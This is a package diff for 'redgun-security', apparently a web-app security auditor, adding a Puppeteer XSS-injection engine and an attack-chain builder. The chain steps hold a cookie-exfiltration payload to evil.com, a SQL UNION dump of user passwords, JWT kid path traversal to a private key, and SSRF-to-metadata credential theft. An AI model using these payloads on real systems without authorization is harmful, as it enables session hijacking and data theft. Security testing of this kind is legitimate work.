redgun-security 2.0.0 → 2.2.0

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "redgun-security",
-  "version": "2.0.0",
+  "version": "2.2.0",
   "description": "Black-box & white-box security auditor for web applications with HackTricks techniques",
   "type": "module",
   "main": "scan.js",

package/scan.js

@@ -8,6 +8,8 @@ import { scanSamlRemote, scanLdapRemote, scanMfaBypass, scanWebsocketReplay, sca
 import { scanSsrfBypassChains, scanJwtRemoteAdvanced, scanGrpc, scanOpenApi, scanWebrtc, scanStoredDomXss, scanSsiRemote, scanXpathRemote, scanTimingRemote } from './src/remote/complete.js';
 import { scanLlmRemote, scanCssInjectionRemote, scanPostMessageRemote, scanEsiRemote, scanHttp3, scanHpackBomb, scanSmtpRemote, scanDkimReplay } from './src/remote/modern.js';
 import { validateFindings } from './src/core/validator.js';
+import { buildAttackChains } from './src/core/chains.js';
+import { runBrowserEngine } from './src/remote/browser.js';
 
 export async function runRemoteScan(url, spinner, modules = null) {
   const target = new URL(url);
@@ -15,6 +17,7 @@ export async function runRemoteScan(url, spinner, modules = null) {
   const origin = target.origin;
 
   const allModules = [
+    { name: 'Browser Engine (Puppeteer)', value: 'browser', fn: () => runBrowserEngine(origin, spinner) },
     { name: 'Probe & Fingerprint (httpx)', value: 'probe', fn: () => runProbe(origin, spinner) },
     { name: 'Crawl & Extract (Katana)', value: 'crawl', fn: () => runCrawler(origin, spinner) },
     { name: 'HTTP Headers', value: 'headers', fn: () => scanHeaders(origin, spinner) },
@@ -89,6 +92,9 @@ export async function runRemoteScan(url, spinner, modules = null) {
 
   spinner.text = '[Validation] Verifying findings...';
   await validateFindings(origin, spinner);
+
+  spinner.text = '[Chains] Building attack chains...';
+  await buildAttackChains(origin, spinner);
 }
 
 async function scanHeaders(origin, spinner) {

package/src/core/chains.js

@@ -0,0 +1,206 @@
+import { getFindings, addFinding } from './findings.js';
+import { fetchText } from '../utils/fetch.js';
+
+export async function buildAttackChains(origin, spinner) {
+  const findings = getFindings();
+  const confirmed = findings.filter(f => f.validated && f.exploitability === 'confirmed');
+  const inconclusive = findings.filter(f => f.validated && f.exploitability === 'inconclusive');
+
+  const allRelevant = [...confirmed, ...inconclusive];
+  const chains = [];
+
+  spinner.text = '[Chains] Building attack chains...';
+
+  const hasXss = allRelevant.filter(f => f.title.toLowerCase().includes('xss') && f.module.includes('Browser'));
+  const hasSqli = allRelevant.filter(f => f.title.toLowerCase().includes('sql'));
+  const hasOpenRedirect = allRelevant.filter(f => f.title.toLowerCase().includes('open redirect') || f.title.toLowerCase().includes('redirect'));
+  const hasSsrf = allRelevant.filter(f => f.title.toLowerCase().includes('ssrf'));
+  const hasJwt = allRelevant.filter(f => f.title.toLowerCase().includes('jwt'));
+  const hasCors = allRelevant.filter(f => f.title.toLowerCase().includes('cors'));
+  const hasCsrf = allRelevant.filter(f => f.title.toLowerCase().includes('csrf') || f.title.toLowerCase().includes('state-mut'));
+  const hasIdor = allRelevant.filter(f => f.title.toLowerCase().includes('idor') || f.title.toLowerCase().includes('access control'));
+  const hasNosql = allRelevant.filter(f => f.title.toLowerCase().includes('nosql'));
+  const hasLfi = allRelevant.filter(f => f.title.toLowerCase().includes('lfi') || f.title.toLowerCase().includes('path traversal'));
+  const hasOauth = allRelevant.filter(f => f.title.toLowerCase().includes('oauth'));
+  const hasSubdomain = allRelevant.filter(f => f.title.toLowerCase().includes('subdomain') || f.title.toLowerCase().includes('takeover'));
+  const hasAuthBypass = allRelevant.filter(f => f.title.toLowerCase().includes('auth bypass') || f.title.toLowerCase().includes('authentication'));
+  const hasCookie = allRelevant.filter(f => f.title.toLowerCase().includes('cookie'));
+  const hasExposed = allRelevant.filter(f => f.module === 'Exposed Files');
+
+  if (hasOpenRedirect.length > 0 && hasOauth.length > 0) {
+    chains.push({
+      name: 'Open Redirect → OAuth Token Theft → ATO',
+      primitives: [hasOpenRedirect[0].title, hasOauth[0].title],
+      steps: [
+        `1. Open redirect via ${extractParam(hasOpenRedirect[0].title)} parameter`,
+        '2. Craft OAuth authorization URL with redirect_uri pointing to open redirect',
+        '3. Victim clicks link → redirected to attacker domain with OAuth code/token',
+        '4. Attacker exchanges code for access token → full account takeover',
+      ],
+      impact: 'CRITICAL',
+      confidence: hasOpenRedirect.some(f => f.confidence >= 80) && hasOauth.some(f => f.confidence >= 70) ? 85 : 55,
+    });
+  }
+
+  if (hasXss.length > 0 && hasCookie.length > 0) {
+    chains.push({
+      name: 'XSS → Cookie Theft → Session Hijacking → ATO',
+      primitives: [hasXss[0].title, hasCookie[0].title],
+      steps: [
+        '1. Inject XSS payload to steal cookies: fetch("//evil.com/?c="+document.cookie)',
+        `2. Cookie missing HttpOnly flag — accessible via JavaScript`,
+        '3. Attacker receives victim session cookie via XSS callback',
+        '4. Set stolen cookie in browser → authenticated as victim → full ATO',
+      ],
+      impact: 'CRITICAL',
+      confidence: hasXss.some(f => f.confidence >= 80) && hasCookie.some(f => f.confidence >= 60) ? 90 : 60,
+    });
+  }
+
+  if (hasSsrf.length > 0 && hasExposed.length > 0) {
+    chains.push({
+      name: 'SSRF → Cloud Metadata → Credential Leak',
+      primitives: [hasSsrf[0].title, hasExposed[0]?.title || 'Exposed internal endpoint'],
+      steps: [
+        '1. Exploit SSRF to access internal cloud metadata (169.254.169.254)',
+        '2. Extract IAM credentials from metadata response',
+        '3. Use leaked credentials for AWS CLI access',
+        '4. Enumerate S3 buckets, Lambda functions, RDS databases',
+      ],
+      impact: 'CRITICAL',
+      confidence: hasSsrf.some(f => f.confidence >= 80) ? 80 : 50,
+    });
+  }
+
+  if (hasJwt.length > 0 && hasLfi.length > 0) {
+    chains.push({
+      name: 'JWT kid Injection → Path Traversal → Key Read → Token Forge',
+      primitives: [hasJwt[0].title, hasLfi[0].title],
+      steps: [
+        '1. JWT uses kid (Key ID) from user input — inject path traversal',
+        "2. Set kid to '../../../../etc/ssl/private/server.key'",
+        '3. Server reads private key and signs attacker-forged JWT',
+        '4. Forge admin JWT → full privileged access',
+      ],
+      impact: 'CRITICAL',
+      confidence: hasJwt.some(f => f.confidence >= 70) ? 75 : 45,
+    });
+  }
+
+  if (hasSqli.length > 0 && hasAuthBypass.length > 0) {
+    chains.push({
+      name: 'SQL Injection → Data Dump → Password Hashes → Credential Stuffing',
+      primitives: [hasSqli[0].title, hasAuthBypass[0].title],
+      steps: [
+        '1. Exploit SQLi to extract user table: UNION SELECT email,password FROM users',
+        '2. Crack extracted password hashes (hashcat/john)',
+        '3. Use credentials for credential stuffing on other services',
+        '4. If MFA bypass found, directly access accounts with cracked passwords',
+      ],
+      impact: 'CRITICAL',
+      confidence: hasSqli.some(f => f.confidence >= 80) ? 85 : 55,
+    });
+  }
+
+  if (hasNosql.length > 0 && hasIdor.length > 0) {
+    chains.push({
+      name: 'NoSQL Injection → Auth Bypass → IDOR → Mass Data Extraction',
+      primitives: [hasNosql[0].title, hasIdor[0].title],
+      steps: [
+        '1. Bypass auth via NoSQL injection ($ne operator)',
+        '2. Gain authenticated session without valid credentials',
+        '3. Exploit IDOR by iterating object IDs (user/1, user/2, user/3...)',
+        '4. Extract all user data, PII, financial info',
+      ],
+      impact: 'CRITICAL',
+      confidence: hasNosql.some(f => f.confidence >= 80) ? 85 : 55,
+    });
+  }
+
+  if (hasCors.length > 0 && hasCsrf.length > 0) {
+    chains.push({
+      name: 'CORS Misconfig → CSRF → Privilege Escalation',
+      primitives: [hasCors[0].title, hasCsrf[0].title],
+      steps: [
+        '1. CORS reflects arbitrary origin with credentials',
+        '2. Host malicious page on attacker domain',
+        '3. CSRF attack from attacker domain: POST /api/admin/create-user',
+        '4. Victim browser sends authenticated cross-origin request with cookies',
+      ],
+      impact: 'HIGH',
+      confidence: hasCors.some(f => f.confidence >= 80) && hasCsrf.some(f => f.confidence >= 60) ? 80 : 55,
+    });
+  }
+
+  if (hasSubdomain.length > 0 && hasCookie.length > 0) {
+    chains.push({
+      name: 'Subdomain Takeover → Cookie Scope Abuse → Session Fixation',
+      primitives: [hasSubdomain[0].title, hasCookie[0].title],
+      steps: [
+        '1. Take over dangling subdomain (CNAME pointing to unregistered cloud resource)',
+        '2. Deploy malicious page on the taken-over subdomain',
+        '3. Set cookies scoped to parent domain via Set-Cookie header',
+        "4. Fixate victim's session → intercept authenticated requests",
+      ],
+      impact: 'HIGH',
+      confidence: 65,
+    });
+  }
+
+  if (hasAuthBypass.length > 0 && hasIdor.length > 0) {
+    chains.push({
+      name: 'Auth Bypass → IDOR → Privilege Escalation',
+      primitives: [hasAuthBypass[0].title, hasIdor[0].title],
+      steps: [
+        '1. Bypass authentication via found auth vulnerability',
+        '2. Access restricted endpoints',
+        '3. Exploit IDOR to access other users/tenants data',
+        '4. Read/modify admin-level resources → full compromise',
+      ],
+      impact: 'CRITICAL',
+      confidence: hasAuthBypass.some(f => f.confidence >= 70) ? 80 : 55,
+    });
+  }
+
+  if (openRedirectXssTester(allRelevant)) {
+    chains.push({
+      name: 'Open Redirect → XSS (via javascript: URI) → Credential Phishing',
+      primitives: ['Open Redirect', 'DOM/Browser interaction surface'],
+      steps: [
+        '1. Open redirect allows javascript: URIs',
+        '2. Craft: javascript:alert(document.cookie) as redirect target',
+        '3. Victim clicks link → XSS executes in application context',
+        '4. Steal credentials, CSRF tokens, or inject fake login form',
+      ],
+      impact: 'HIGH',
+      confidence: 60,
+    });
+  }
+
+  if (chains.length > 0) {
+    reportChains(chains);
+  }
+}
+
+async function reportChains(chains) {
+  for (const chain of chains) {
+    addFinding(
+      chain.impact,
+      'Attack Chain',
+      chain.name,
+      `Primitives: ${chain.primitives.join(' + ')}\n\nChain:\n${chain.steps.join('\n')}\n\nConfidence: ${chain.confidence}%`,
+      `Execute chain steps manually to confirm full impact. Submit as chained vulnerability for higher bounty payout.`
+    );
+  }
+}
+
+function extractParam(title) {
+  const m = title.match(/via\s+\?(\w+)=/);
+  return m ? m[1] : 'unknown';
+}
+
+function openRedirectXssTester(findings) {
+  const redirectTitles = findings.filter(f => f.title.toLowerCase().includes('open redirect')).map(f => f.title);
+  const xssTitles = findings.filter(f => f.title.toLowerCase().includes('xss')).map(f => f.title);
+  return redirectTitles.length > 0 && xssTitles.length > 0;
+}

package/src/remote/browser.js

@@ -0,0 +1,263 @@
+import { addFinding } from '../core/findings.js';
+import { writeFileSync, mkdirSync, existsSync } from 'fs';
+import { join } from 'path';
+
+export async function runBrowserEngine(origin, spinner) {
+  spinner.text = '[Browser] Launching headless Chromium...';
+
+  let puppeteer;
+  try {
+    puppeteer = (await import('puppeteer')).default;
+  } catch {
+    spinner.warn('Puppeteer not available — browser tests skipped');
+    return;
+  }
+
+  let browser;
+  let page;
+  const results = {
+    alerts: [],
+    consoleErrors: [],
+    networkRequests: [],
+    wsConnections: [],
+    localStorage: {},
+    sessionStorage: {},
+    serviceWorkers: false,
+    postMessageListens: false,
+    screenshotPath: null,
+    xssTested: 0,
+    xssConfirmed: 0,
+    formsFound: 0,
+  };
+
+  try {
+    browser = await puppeteer.launch({
+      headless: 'new',
+      args: ['--no-sandbox', '--disable-setuid-sandbox', '--disable-web-security', '--disable-features=IsolateOrigins,site-per-process'],
+    });
+
+    page = await browser.newPage();
+    await page.setViewport({ width: 1280, height: 800 });
+
+    page.on('dialog', async (dialog) => {
+      results.alerts.push({ message: dialog.message(), type: dialog.type() });
+      await dialog.dismiss();
+    });
+
+    page.on('console', (msg) => {
+      if (msg.type() === 'error') {
+        results.consoleErrors.push(msg.text());
+      }
+    });
+
+    page.on('request', (req) => {
+      if (req.resourceType() === 'websocket') {
+        results.wsConnections.push(req.url());
+      }
+      results.networkRequests.push({
+        url: req.url(),
+        method: req.method(),
+        type: req.resourceType(),
+      });
+    });
+
+    spinner.text = '[Browser] Navigating to target...';
+    await page.goto(origin, { waitUntil: 'networkidle2', timeout: 30000 });
+
+    results.serviceWorkers = await page.evaluate(() => 'serviceWorker' in navigator && Boolean(navigator.serviceWorker.controller));
+
+    results.postMessageListens = await page.evaluate(() => {
+      let hasListener = false;
+      window.addEventListener('message', () => { hasListener = true; });
+      window.postMessage('__redgun_probe__', '*');
+      return new Promise(r => setTimeout(() => r(hasListener), 200));
+    });
+
+    results.localStorage = await page.evaluate(() => {
+      const data = {};
+      for (let i = 0; i < localStorage.length; i++) {
+        const key = localStorage.key(i);
+        data[key] = localStorage.getItem(key);
+      }
+      return data;
+    });
+
+    results.sessionStorage = await page.evaluate(() => {
+      const data = {};
+      try {
+        for (let i = 0; i < sessionStorage.length; i++) {
+          const key = sessionStorage.key(i);
+          data[key] = sessionStorage.getItem(key);
+        }
+      } catch {}
+      return data;
+    });
+
+    spinner.text = '[Browser] Scanning for forms and inputs...';
+    const inputFields = await page.evaluate(() => {
+      const fields = [];
+      document.querySelectorAll('input, textarea, select').forEach((el) => {
+        const name = el.getAttribute('name') || el.getAttribute('id') || el.getAttribute('class') || '';
+        const type = el.getAttribute('type') || el.tagName.toLowerCase();
+        fields.push({ name: name.substring(0, 60), type });
+      });
+      return fields;
+    });
+
+    results.formsFound = await page.evaluate(() => document.querySelectorAll('form').length);
+
+    spinner.text = '[Browser] Testing DOM XSS...';
+    const xssPayloads = [
+      '<img src=x onerror=alert("REDGUN_XSS") />',
+      '<svg onload=alert("REDGUN_XSS") />',
+      '" onfocus=alert("REDGUN_XSS") autofocus="',
+      '"><img src=x onerror=alert("REDGUN_XSS")>',
+      'javascript:alert("REDGUN_XSS")',
+    ];
+
+    for (const field of inputFields.slice(0, 20)) {
+      if (!field.name) continue;
+      for (const payload of xssPayloads.slice(0, 3)) {
+        try {
+          await page.evaluate((name, payload) => {
+            const el = document.querySelector(`[name="${name}"], [id="${name}"]`);
+            if (el) {
+              el.value = payload;
+              el.dispatchEvent(new Event('input', { bubbles: true }));
+              el.dispatchEvent(new Event('change', { bubbles: true }));
+            }
+          }, field.name, payload);
+          results.xssTested++;
+        } catch {}
+      }
+    }
+
+    for (const formFields of inputFields.filter(f => f.name)) {
+      try {
+        await page.evaluate((name) => {
+          const input = document.querySelector(`[name="${name}"], [id="${name}"]`);
+          const form = input?.closest('form');
+          if (form) form.submit();
+        }, formFields.name);
+        await new Promise(r => setTimeout(r, 300));
+
+        if (results.alerts.some(a => a.message.includes('REDGUN_XSS'))) {
+          results.xssConfirmed++;
+        }
+      } catch {}
+    }
+
+    const currentPageUrl = page.url();
+    if (results.alerts.some(a => a.message.includes('REDGUN_XSS')) && currentPageUrl.includes(origin)) {
+      results.xssConfirmed = Math.max(results.xssConfirmed, 1);
+    }
+
+    if (results.alerts.length > 0 || results.xssConfirmed > 0) {
+      const screenshotsDir = './scans';
+      if (!existsSync(screenshotsDir)) mkdirSync(screenshotsDir, { recursive: true });
+      const ts = Date.now();
+      results.screenshotPath = join(screenshotsDir, `redgun-xss-${ts}.png`);
+      await page.screenshot({ path: results.screenshotPath, fullPage: true });
+    }
+
+  } catch (err) {
+    spinner.text = `[Browser] Error: ${err.message}`;
+  } finally {
+    if (browser) await browser.close();
+  }
+
+  reportFindings(origin, results);
+}
+
+function reportFindings(origin, results) {
+  if (results.xssConfirmed > 0) {
+    addFinding(
+      'CRITICAL',
+      'Browser XSS',
+      `${results.xssConfirmed} DOM/Stored XSS confirmed via browser`,
+      `${results.xssTested} payloads injected into ${results.formsFound} forms — ${results.xssConfirmed} alert() triggers detected\nScreenshot: ${results.screenshotPath || 'N/A'}`,
+      'Sanitize all user input on both client and server side. Use DOMPurify, React escape, or framework auto-escaping.'
+    );
+  } else if (results.xssTested > 0) {
+    addFinding(
+      'INFO',
+      'Browser XSS',
+      `Tested ${results.xssTested} inputs — no XSS confirmed`,
+      `${results.formsFound} forms analyzed with 5 XSS payload types`,
+      'DOM/Stored XSS not confirmed — continue manual testing with application-specific payloads'
+    );
+  }
+
+  const apiRequests = results.networkRequests.filter(r => r.url.includes('/api/'));
+  if (apiRequests.length > 0) {
+    const uniqueApis = [...new Set(apiRequests.map(r => r.url).filter(u => u.startsWith(origin)))];
+
+    if (uniqueApis.length > 5) {
+      addFinding(
+        'INFO',
+        'Browser Recon',
+        `${uniqueApis.length} API endpoints captured from browser network`,
+        `APIs: ${uniqueApis.slice(0, 10).join(', ')}${uniqueApis.length > 10 ? ` +${uniqueApis.length - 10} more` : ''}`,
+        'Review captured API endpoints for auth requirements and sensitive data exposure'
+      );
+    }
+  }
+
+  if (results.wsConnections.length > 0) {
+    addFinding(
+      'MEDIUM',
+      'Browser WebSocket',
+      `${results.wsConnections.length} WebSocket connection(s) detected`,
+      `WS: ${results.wsConnections.join(', ')}`,
+      'Test WebSocket for CSWSH, missing auth, and message tampering'
+    );
+  }
+
+  if (results.serviceWorkers) {
+    addFinding(
+      'LOW',
+      'Browser Service Worker',
+      'Service Worker active on page',
+      'SW registered — test for importScripts abuse and fetch listener tampering',
+      'Validate Service Worker scope and origin. Use Subresource Integrity for imported scripts.'
+    );
+  }
+
+  if (results.postMessageListens) {
+    addFinding(
+      'MEDIUM',
+      'Browser postMessage',
+      'postMessage listener detected (runtime check)',
+      'Page has active message event handler',
+      'Audit postMessage listeners for missing origin validation. Test cross-origin iframe attacks.'
+    );
+  }
+
+  const localKeys = Object.keys(results.localStorage || {});
+  const sessionKeys = Object.keys(results.sessionStorage || {});
+  if (localKeys.length > 0 || sessionKeys.length > 0) {
+    const sensitiveStorage = [...localKeys, ...sessionKeys].filter(k =>
+      /token|secret|key|password|credential|jwt|auth|session|user/i.test(k)
+    );
+
+    if (sensitiveStorage.length > 0) {
+      addFinding(
+        'HIGH',
+        'Browser Storage',
+        `${sensitiveStorage.length} sensitive items in browser storage`,
+        `Keys: ${sensitiveStorage.join(', ')}`,
+        'Never store tokens, secrets, or credentials in localStorage/sessionStorage. Use httpOnly cookies for session management.'
+      );
+    }
+  }
+
+  if (results.consoleErrors.length > 5) {
+    addFinding(
+      'LOW',
+      'Browser Console',
+      `${results.consoleErrors.length} console errors detected`,
+      `Sample: ${results.consoleErrors.slice(0, 3).join(' | ')}`,
+      'Console errors may reveal internal paths, CSP violations, or API error messages'
+    );
+  }
+}